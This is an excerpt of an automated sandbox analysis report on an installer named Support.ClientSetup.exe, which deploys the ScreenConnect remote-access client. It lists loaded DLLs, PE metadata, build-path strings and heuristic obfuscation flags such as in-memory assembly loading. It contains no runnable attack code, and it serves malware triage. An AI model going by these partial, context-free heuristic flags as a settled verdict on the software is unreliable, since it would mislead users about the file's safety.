                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: windows.networking.connectivity.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: synccontroller.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: aphostclient.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: accountaccessor.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: dsclient.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: systemeventsbrokerclient.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: mccsengineshared.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: cemapi.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: userdatatypehelperutil.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: phoneutil.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
                                  Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: mpclient.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: secur32.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: sspicli.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: version.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: msasn1.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: kernel.appcore.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: userenv.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: gpapi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: wbemcomn.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: amsi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: profapi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: wscapi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: urlmon.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: iertutil.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: srvcli.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: netutils.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: slc.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: sppc.dll
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                                  Source: Window Recorder | Window detected: More than 3 window changes detected
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                  Source: Support.ClientSetup.exe | Static PE information: certificate valid
                                  Source: Support.ClientSetup.exe | Static file information: File size 5622816 > 1048576
                                  Source: Support.ClientSetup.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                                  Source: Support.ClientSetup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: Support.ClientSetup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: Support.ClientSetup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: Support.ClientSetup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Support.ClientSetup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: Support.ClientSetup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: Support.ClientSetup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Support.ClientSetup.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Support.ClientSetup.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Support.ClientSetup.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160002867.00000000019C0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160464436.0000000001A52000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1103254270.00000000000AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Support.ClientSetup.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1083284190.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Support.ClientSetup.exe, MSI837B.tmp.3.dr, 3b7ed6.rbs.3.dr, MSI8185.tmp.3.dr, 3b7ed7.msi.3.dr, MSI8195.tmp.3.dr, ScreenConnect.ClientSetup.msi.0.dr, 3b7ed5.msi.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: Support.ClientSetup.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Support.ClientSetup.exe, MSI7753.tmp.2.dr, 3b7ed7.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, 3b7ed5.msi.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160153814.0000000001A12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160153814.0000000001A12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Support.ClientSetup.exe
                                   Source: Support.ClientSetup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                   Source: Support.ClientSetup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                   Source: Support.ClientSetup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                   Source: Support.ClientSetup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                   Source: Support.ClientSetup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                   Source: 0.0.Support.ClientSetup.exe.11778ec.1.raw.unpack, Program.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
                                   Source: 0.2.Support.ClientSetup.exe.1d40000.0.raw.unpack, Program.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
                                   Source: Support.ClientSetup.exe | Static PE information: real checksum: 0x54d1c1 should be: 0x55e8a8
                                   Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Code function: 0_2_05F46460 pushfd ; retf 0_2_05F46461
                                   Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Code function: 0_2_05F43635 pushfd ; ret 0_2_05F43633
                                   Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Code function: 0_2_05F43AD7 push ebx; retf 0_2_05F43ADA
                                   Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Code function: 0_2_05F649E0 push eax; mov dword ptr [esp], edx 0_2_05F649F4
                                   Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_3_072C21E8 push FFFFFFC3h; ret 5_3_072C220A
                                   Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_3_072C723B push eax; iretd 5_3_072C7245
                                   Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Code function: 8_2_05EFBC98 push eax; iretd 8_2_05EFBC99
                                   Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FF9CC3C0958 push ebx; retf 9_2_00007FF9CC3C098A
                                   Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FF9CC3C09D8 push ebx; retf 9_2_00007FF9CC3C098A
                                   Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FF9CC3C22ED push ebx; retf 9_2_00007FF9CC3C22FA
                                   Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FF9CC6C2672 push ds; iretd 9_2_00007FF9CC6C2674
                                   Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe | Code function: 11_2_00007FF9CC3D0958 push ebx; retf 11_2_00007FF9CC3D098A
                                   Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe | Code function: 11_2_00007FF9CC3D09D8 push ebx; retf 11_2_00007FF9CC3D098A
                                   Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe | Code function: 11_2_00007FF9CC3D22B1 push ebx; retf 11_2_00007FF9CC3D22FA
